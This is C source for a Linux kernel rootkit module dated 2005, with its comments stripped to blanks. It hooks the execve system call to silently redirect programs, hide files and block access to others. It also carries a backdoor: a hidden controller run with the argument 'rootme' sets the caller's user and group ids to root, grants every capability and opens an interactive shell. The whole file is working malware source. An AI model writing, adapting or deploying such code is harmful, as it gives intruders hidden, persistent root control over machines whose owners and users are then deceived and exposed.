/*********************************************
 *                                           *
 *              *
 *   ,   .    *
 *  Written by _4epen, 2005.                 *
 *                                           *
 *********************************************/

#include <asm/uaccess.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/unistd.h>
#include <linux/string.h>

#include "defines.h"
#include "prototp.h"

extern int __NR_execve1;
extern int (*o_brk)(void*);
extern int authorized;

/*     */
int start_sh(char*[], char*[]);

/*    execve()  */
int execve1(const char *filename, const char *argv[], const char *envp[]) { long __res; __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_execve1), "b"((long) (filename)), "c"((long) (argv)), "d"((long) (envp))); return (int) __res; }

/*     execve() */
int h_execve(const char* filename, const char* argv[], const char* envp[])
{
	char* file;
	char* temp;
	int ret, tmp;
	unsigned long end;
	file = get_full_pathname(filename);
	/*  ,     */
	if ((temp=redirected(file))!=NULL)
	{
		/*      */
		end = current->mm->brk;
		ret = o_brk((void *)(end+300));
		if (ret<0) return ret;
		/*         */
		copy_to_user((void *)(end+2), temp, strlen(temp)+1);
		/*     */
		ret = execve1((char *)(end+2), argv, envp);
		/*         */
		tmp = o_brk((void *)end);
		/*        */
		if(filename[0]!='/') kfree(file);
		return ret;
	}
	/*  ,      */
	if(forbidden(file)) { if(filename[0]!='/') kfree(file); return -EACCES; }
	/*  ,      */
	if(f_hidden(file)) { if(filename[0]!='/') kfree(file); return -ENOENT; }
	/*           */
	if(strcmp(filename, CONTROLLER)==0 && strcmp(argv[1], "rootme")==0 && authorized) {
		/*       */
		current->uid = current->gid = 0;
		current->euid = current->egid = 0;
		current->suid = current->sgid = 0;
		current->fsgid = current->fsgid = 0;
		/*      */
		cap_t(current->cap_effective) = ~0;
		cap_t(current->cap_inheritable) = ~0;
		cap_t(current->cap_permitted) = ~0;
		/*     */
		if(filename[0]!='/') kfree(file);
		/*     */
		return start_sh((char**)argv, (char**)envp);
	}
	/*  ,      */
	if(strcmp(filename, CONTROLLER)==0) {
		/*     */
		controller(argv, envp);
		/*     */
		if(filename[0]!='/') kfree(file);
		return -ENOENT;
	}
	/*     */
	if(filename[0]!='/') kfree(file);
	/*      */
	ret=execve1(filename, argv, envp);
	return ret;
}

int start_sh(char* argv[], char* envp[])
{
	int ret, r;
	char *temp;
	unsigned long end;
	/*      temp  */
	temp = kmalloc(20, GFP_KERNEL);
	strcpy(temp, "/bin/sh");
	/*     */
	strcpy(argv[0], "sh");
	strcpy(argv[1], "-i");
	/*      */
	end = current->mm->brk;
	ret = o_brk((void *)(end+300));
	if (ret<0) return ret;
	/*         */
	copy_to_user((void *)(end+2), temp, strlen(temp)+1);
	/*     */
	r = execve1((char *)(end+2), (const char**)argv, (const char**)envp);
	/*         */
	ret = o_brk((void *)end);
	if (ret<0) return ret;
	return r;
}
